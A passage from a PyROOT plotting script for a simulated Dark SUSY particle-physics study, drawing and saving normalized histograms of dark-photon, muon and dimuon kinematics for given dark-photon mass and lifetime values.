cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_L_Z.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_L_Z.C")
h_gammaD_1_cT_dummy.Draw()
normConstant = integral(h_gammaD_1_cT)
h_gammaD_1_cT.Scale(1/normConstant)
h_gammaD_1_cT.Draw("same")
normConstant2 = integral(h_gammaD_2_cT)
h_gammaD_2_cT.Scale(1/normConstant2)
h_gammaD_2_cT.Draw("same")
scaleAxisYcT(h_gammaD_2_cT,h_gammaD_1_cT_dummy)
#h_gammaD_1_cT.DrawNormalized("same")
#h_gammaD_2_cT.DrawNormalized("same")
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_gammaD_1_cT,"1st dark photon (leading p_{T})","L")
legend.AddEntry(h_gammaD_2_cT,"2nd dark photon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT.C")
h_gammaD_1_cT_lab_dummy.Draw()
normConstant = integral(h_gammaD_1_cT_lab)
h_gammaD_1_cT_lab.Scale(1/normConstant)
h_gammaD_1_cT_lab.Draw("same")
normConstant2 = integral(h_gammaD_2_cT_lab)
h_gammaD_2_cT_lab.Scale(1/normConstant2)
h_gammaD_2_cT_lab.Draw("same")
scaleAxisYcT(h_gammaD_2_cT_lab,h_gammaD_1_cT_lab_dummy)
#h_gammaD_1_cT_lab.DrawNormalized("same")
#h_gammaD_2_cT_lab.DrawNormalized("same")
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_gammaD_1_cT_lab,"1st dark photon (leading p_{T})","L")
legend.AddEntry(h_gammaD_2_cT_lab,"2nd dark photon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT_lab.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT_lab.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT_lab.C")
h_gammaD_1_cT_XY_lab_dummy.Draw()
normConstant = integral(h_gammaD_1_cT_XY_lab)
h_gammaD_1_cT_XY_lab.Scale(1/normConstant)
h_gammaD_1_cT_XY_lab.Draw("same")
normConstant2 = integral(h_gammaD_2_cT_XY_lab)
h_gammaD_2_cT_XY_lab.Scale(1/normConstant2)
h_gammaD_2_cT_XY_lab.Draw("same")
scaleAxisYcT(h_gammaD_2_cT_XY_lab,h_gammaD_1_cT_XY_lab_dummy)
#h_gammaD_1_cT_XY_lab.DrawNormalized("same")
#h_gammaD_2_cT_XY_lab.DrawNormalized("same")
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_gammaD_1_cT_XY_lab,"1st dark photon (leading p_{T})","L")
legend.AddEntry(h_gammaD_2_cT_XY_lab,"2nd dark photon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT_XY_lab.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT_XY_lab.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT_XY_lab.C")
h_gammaD_1_cT_Z_lab_dummy.Draw()
normConstant = integral(h_gammaD_1_cT_Z_lab)
h_gammaD_1_cT_Z_lab.Scale(1/normConstant)
h_gammaD_1_cT_Z_lab.Draw("same")
normConstant2 = integral(h_gammaD_2_cT_Z_lab)
h_gammaD_2_cT_Z_lab.Scale(1/normConstant2)
h_gammaD_2_cT_Z_lab.Draw("same")
scaleAxisYcT(h_gammaD_2_cT_Z_lab,h_gammaD_1_cT_Z_lab_dummy)
#h_gammaD_1_cT_Z_lab.DrawNormalized("same")
#h_gammaD_2_cT_Z_lab.DrawNormalized("same")
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_gammaD_1_cT_Z_lab,"1st dark photon (leading p_{T})","L")
legend.AddEntry(h_gammaD_2_cT_Z_lab,"2nd dark photon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT_Z_lab.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT_Z_lab.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT_Z_lab.C")
h_gammaD_1_pT_dummy.Draw()
h_gammaD_1_pT.DrawNormalized("same")
h_gammaD_2_pT.DrawNormalized("same")
scaleAxisY(h_gammaD_2_pT,h_gammaD_1_pT_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_gammaD_1_pT,"1st dark photon (leading p_{T})","L")
legend.AddEntry(h_gammaD_2_pT,"2nd dark photon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_pT.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_pT.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_pT.C")
h_gammaD_1_pZ_dummy.Draw()
#plotOverflow(h_gammaD_1_pZ)
#plotOverflow(h_gammaD_2_pZ)
h_gammaD_1_pZ.DrawNormalized("same")
h_gammaD_2_pZ.DrawNormalized("same")
scaleAxisY(h_gammaD_2_pZ,h_gammaD_1_pZ_dummy)
#htmp = ROOT.TH1F(h_gammaD_1_pZ.GetName(),h_gammaD_1_pZ.GetTitle(), h_gammaD_1_pZ.GetNbinsX()+1, h_gammaD_1_pZ.GetBinLowEdge(1), h_gammaD_1_pZ.GetBinLowEdge(h_gammaD_1_pZ.GetNbinsX()+1)+h_gammaD_1_pZ.GetBinWidth(h_gammaD_1_pZ.GetNbinsX()+1))
#for i in range(1, h_gammaD_1_pZ.GetNbinsX()+1 ):
# htmp.Fill(htmp.GetBinCenter(i), h_gammaD_1_pZ.GetBinContent(i))
#htmp.Fill(h_gammaD_1_pZ.GetNbinsX()-1, h_gammaD_1_pZ.GetBinContent(0))
#htmp.SetEntries(h_gammaD_1_pZ.GetEntries())
#htmp.SetLineColor(ROOT.kRed)
#htmp.DrawNormalized("same")
#htmp2 = ROOT.TH1F(h_gammaD_2_pZ.GetName(), h_gammaD_2_pZ.GetTitle(), h_gammaD_2_pZ.GetNbinsX()+1, h_gammaD_2_pZ.GetBinLowEdge(1), h_gammaD_2_pZ.GetBinLowEdge(h_gammaD_2_pZ.GetNbinsX()+1)+h_gammaD_2_pZ.GetBinWidth(h_gammaD_2_pZ.GetNbinsX()+1))
#for i in range(1, h_gammaD_2_pZ.GetNbinsX()+1 ):
# htmp2.Fill(htmp2.GetBinCenter(i), h_gammaD_2_pZ.GetBinContent(i))
#htmp2.Fill(h_gammaD_2_pZ.GetNbinsX()-1, h_gammaD_2_pZ.GetBinContent(0))
#htmp2.SetEntries(h_gammaD_2_pZ.GetEntries())
#htmp2.SetLineColor(ROOT.kBlue)
#htmp2.DrawNormalized("same")
#h_gammaD_1_pZ.DrawNormalized("same")
#h_gammaD_2_pZ.DrawNormalized("same")
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_gammaD_1_pZ,"1st dark photon (leading p_{T})","L")
legend.AddEntry(h_gammaD_2_pZ,"2nd dark photon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_pZ.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_pZ.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_pZ.C")
h_gammaD_1_Eta_dummy.Draw()
h_gammaD_1_Eta.DrawNormalized("same")
h_gammaD_2_Eta.DrawNormalized("same")
scaleAxisY(h_gammaD_1_Eta,h_gammaD_1_Eta_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_gammaD_1_Eta,"1st dark photon (leading p_{T})","L")
legend.AddEntry(h_gammaD_2_Eta,"2nd dark photon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Eta.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Eta.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Eta.C")
h_gammaD_1_Phi_dummy.Draw()
h_gammaD_1_Phi.DrawNormalized("same")
h_gammaD_2_Phi.DrawNormalized("same")
scaleAxisY(h_gammaD_1_Phi,h_gammaD_1_Phi_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_gammaD_1_Phi,"1st dark photon (leading p_{T})","L")
legend.AddEntry(h_gammaD_2_Phi,"2nd dark photon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Phi.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Phi.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Phi.C")
h_gammaD_1_p_dummy.Draw()
plotOverflow(h_gammaD_1_p)
plotOverflow(h_gammaD_2_p)
scaleAxisY(h_gammaD_2_p,h_gammaD_1_p_dummy)
#h_gammaD_1_p.DrawNormalized("same")
#h_gammaD_2_p.DrawNormalized("same")
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_gammaD_1_p,"1st dark photon (leading p_{T})","L")
legend.AddEntry(h_gammaD_2_p,"2nd dark photon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_p.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_p.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_p.C")
h_gammaD_1_M_dummy.Draw()
cnv.SetLogx()
h_gammaD_1_M.DrawNormalized("same")
#h_gammaD_2_M.DrawNormalized("same")
#legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
#legend.SetFillColor(ROOT.kWhite)
#legend.SetFillStyle(0)
#legend.SetBorderSize(0)
#legend.SetTextFont(42)
#legend.SetTextSize(0.02777778)
#legend.SetMargin(0.13)
#legend.AddEntry(h_gammaD_1_M,"1st dark photon (leading p_{T})","L")
#legend.AddEntry(h_gammaD_2_M,"2nd dark photon","L")
#legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_M.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_M.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_M.C")
cnv.SetLogx(0)
h_muon_pT_dummy.Draw()
h_muon_pT_0.DrawNormalized("same")
h_muon_pT_1.DrawNormalized("same")
h_muon_pT_2.DrawNormalized("same")
h_muon_pT_3.DrawNormalized("same")
scaleAxisY(h_muon_pT_3,h_muon_pT_dummy)
legend = ROOT.TLegend(0.6175166,0.6730435,0.9429047,0.7626087)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_muon_pT_0,"1st muon (leading p_{T})","L")
legend.AddEntry(h_muon_pT_1,"2nd muon","L")
legend.AddEntry(h_muon_pT_2,"3rd muon","L")
legend.AddEntry(h_muon_pT_3,"4th muon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_pT.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_pT.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_pT.C")
h_muon_phi_dummy.Draw()
h_muon_phi_0.DrawNormalized("same")
h_muon_phi_1.DrawNormalized("same")
h_muon_phi_2.DrawNormalized("same")
h_muon_phi_3.DrawNormalized("same")
scaleAxisY(h_muon_phi_0,h_muon_phi_dummy)
legend = ROOT.TLegend(0.6175166,0.6730435,0.9429047,0.7626087)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_muon_phi_0,"1st muon (leading p_{T})","L")
legend.AddEntry(h_muon_phi_1,"2nd muon","L")
legend.AddEntry(h_muon_phi_2,"3rd muon","L")
legend.AddEntry(h_muon_phi_3,"4th muon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_phi.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_phi.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_phi.C")
h_muon_pZ_dummy.Draw()
h_muon_pZ_0.DrawNormalized("same")
h_muon_pZ_1.DrawNormalized("same")
h_muon_pZ_2.DrawNormalized("same")
h_muon_pZ_3.DrawNormalized("same")
scaleAxisY(h_muon_pZ_3,h_muon_pZ_dummy)
legend = ROOT.TLegend(0.6175166,0.6730435,0.9429047,0.7626087)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_muon_pZ_0,"1st muon (leading p_{T})","L")
legend.AddEntry(h_muon_pZ_1,"2nd muon","L")
legend.AddEntry(h_muon_pZ_2,"3rd muon","L")
legend.AddEntry(h_muon_pZ_3,"4th muon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_pZ.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_pZ.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_pZ.C")
h_muon_p_dummy.Draw()
h_muon_p_0.DrawNormalized("same")
h_muon_p_1.DrawNormalized("same")
h_muon_p_2.DrawNormalized("same")
h_muon_p_3.DrawNormalized("same")
scaleAxisY(h_muon_p_3,h_muon_p_dummy)
legend = ROOT.TLegend(0.6175166,0.6730435,0.9429047,0.7626087)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_muon_p_0,"1st muon (leading p_{T})","L")
legend.AddEntry(h_muon_p_1,"2nd muon","L")
legend.AddEntry(h_muon_p_2,"3rd muon","L")
legend.AddEntry(h_muon_p_3,"4th muon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_p.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_p.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_p.C")
h_muon_eta_dummy.Draw()
h_muon_eta_0.DrawNormalized("same")
h_muon_eta_1.DrawNormalized("same")
h_muon_eta_2.DrawNormalized("same")
h_muon_eta_3.DrawNormalized("same")
scaleAxisY(h_muon_eta_0,h_muon_eta_dummy)
legend = ROOT.TLegend(0.6175166,0.6730435,0.9429047,0.7626087)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_muon_eta_0,"1st muon (leading p_{T})","L")
legend.AddEntry(h_muon_eta_1,"2nd muon","L")
legend.AddEntry(h_muon_eta_2,"3rd muon","L")
legend.AddEntry(h_muon_eta_3,"4th muon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_eta.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_eta.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_eta.C")
#h_dimuon_m_dummy.Draw()
#h_dimuon_m_0.DrawNormalized("same")
#h_dimuon_m_1.DrawNormalized("same")
#h_dimuon_m_2.DrawNormalized("same")
#h_dimuon_m_3.DrawNormalized("same")
#
#legend = ROOT.TLegend(0.6175166,0.6730435,0.9429047,0.7626087)
#legend.SetFillColor(ROOT.kWhite)
#legend.SetFillStyle(0)
#legend.SetBorderSize(0)
#legend.SetTextFont(42)
#legend.SetTextSize(0.02777778)
#legend.SetMargin(0.13)
#legend.AddEntry(h_dimuon_m_0,"1st dimuon (leading m_{#mu#mu})","L")
#legend.AddEntry(h_dimuon_m_1,"2nd dimuon","L")
#legend.AddEntry(h_dimuon_m_2,"3rd dimuon","L")
#legend.AddEntry(h_dimuon_m_3,"4th dimuon","L")
#legend.Draw()
#info.Draw()
#txtHeader.Draw()
#cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m.pdf")
#cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m.png")
## convert -define.pdf:use-cropbox=true -density 300 CSxBR_vs_mh.pdf -resize 900x900 CSxBR_vs_mh.png
#
#h_dimuon_m_log_dummy.Draw()
#cnv.SetLogy()
#h_dimuon_m_log_0.DrawNormalized("same")
#h_dimuon_m_log_1.DrawNormalized("same")
#h_dimuon_m_log_2.DrawNormalized("same")
#h_dimuon_m_log_3.DrawNormalized("same")
#
#legend = ROOT.TLegend(0.6175166,0.6730435,0.9429047,0.7626087)
#legend.SetFillColor(ROOT.kWhite)
#legend.SetFillStyle(0)
#legend.SetBorderSize(0)
#legend.SetTextFont(42)
#legend.SetTextSize(0.02777778)
#legend.SetMargin(0.13)
#legend.AddEntry(h_dimuon_m_log_0,"1st dimuon (leading m_{#mu#mu})","L")
#legend.AddEntry(h_dimuon_m_log_1,"2nd dimuon","L")
#legend.AddEntry(h_dimuon_m_log_2,"3rd dimuon","L")
#legend.AddEntry(h_dimuon_m_log_3,"4th dimuon","L")
#legend.Draw()
#info.Draw()
#txtHeader.Draw()
#
#cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_log.pdf")
#cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_log.png")
#cnv.SetLogy(0)
#
#h_dimuon_m_real_fake_dummy.Draw()
#h_dimuon_m_real_fake_0.DrawNormalized("same")
#h_dimuon_m_real_fake_1.DrawNormalized("same")
#
#legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
#legend.SetFillColor(ROOT.kWhite)
#legend.SetFillStyle(0)
#legend.SetBorderSize(0)
#legend.SetTextFont(42)
#legend.SetTextSize(0.02777778)
#legend.SetMargin(0.13)
#legend.AddEntry(h_dimuon_m_real_fake_0,"Real dimuons","L")
#legend.AddEntry(h_dimuon_m_real_fake_1,"Fake dimuons","L")
#legend.Draw()
#info.Draw()
#txtHeader.Draw()
#
#cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_real_fake.pdf")
#cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_real_fake.png")
#
#h_dimuon_m_real_fake_log_dummy.Draw()
#cnv.SetLogy()
#h_dimuon_m_real_fake_log_0.DrawNormalized("same")
#h_dimuon_m_real_fake_log_1.DrawNormalized("same")
#legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
#legend.SetFillColor(ROOT.kWhite)
#legend.SetFillStyle(0)
#legend.SetBorderSize(0)
#legend.SetTextFont(42)
#legend.SetTextSize(0.02777778)
#legend.SetMargin(0.13)
#legend.AddEntry(h_dimuon_m_real_fake_log_0,"Real dimuons","L")
#legend.AddEntry(h_dimuon_m_real_fake_log_1,"Fake dimuons","L")
#legend.Draw()
#info.Draw()
#txtHeader.Draw()
#
#cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_real_fake_log.pdf")
#cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_real_fake_log.png")
cnv.SetLogy(0)
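# 2D correlation of the two real-dimuon invariant masses (m1 vs m2).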
h_m1_vs_m2.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m1_vs_m2.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m1_vs_m2.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m1_vs_m2.C")
cnv.SetLogx()
h_m2.Draw()
h_m1.Draw("same")
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m.C")
cnv.SetLogx(0)
h_dimuon_m_fake_dummy.Draw()
h_dimuon_m_fake_0.DrawNormalized("same")
scaleAxisY(h_dimuon_m_fake_0,h_dimuon_m_fake_dummy)
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_fake.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_fake.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_fake.C")
h_dimuon_m_fake_log_dummy.Draw()
cnv.SetLogy()
cnv.SetLogx()
h_dimuon_m_fake_log_0.DrawNormalized("same")
#scaleAxisY(h_dimuon_m_fake_log_0,h_dimuon_m_fake_log_dummy)
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_fake_log.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_fake_log.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_fake_log.C")
cnv.SetLogy(0)
cnv.SetLogx(0)
h_dimuon_1_pT_dummy.Draw()
h_dimuon_1_pT.DrawNormalized("same")
h_dimuon_2_pT.DrawNormalized("same")
scaleAxisY(h_dimuon_2_pT,h_dimuon_1_pT_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_dimuon_1_pT,"1st #mu#mu (leading p_{T})","L")
legend.AddEntry(h_dimuon_2_pT,"2nd #mu#mu","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_pT.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_pT.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_pT.C")
h_dimuon_1_pZ_dummy.Draw()
#plotOverflow(h_dimuon_1_pZ)
#plotOverflow(h_dimuon_2_pZ)
h_dimuon_1_pZ.DrawNormalized("same")
h_dimuon_2_pZ.DrawNormalized("same")
scaleAxisY(h_dimuon_2_pZ,h_dimuon_1_pZ_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
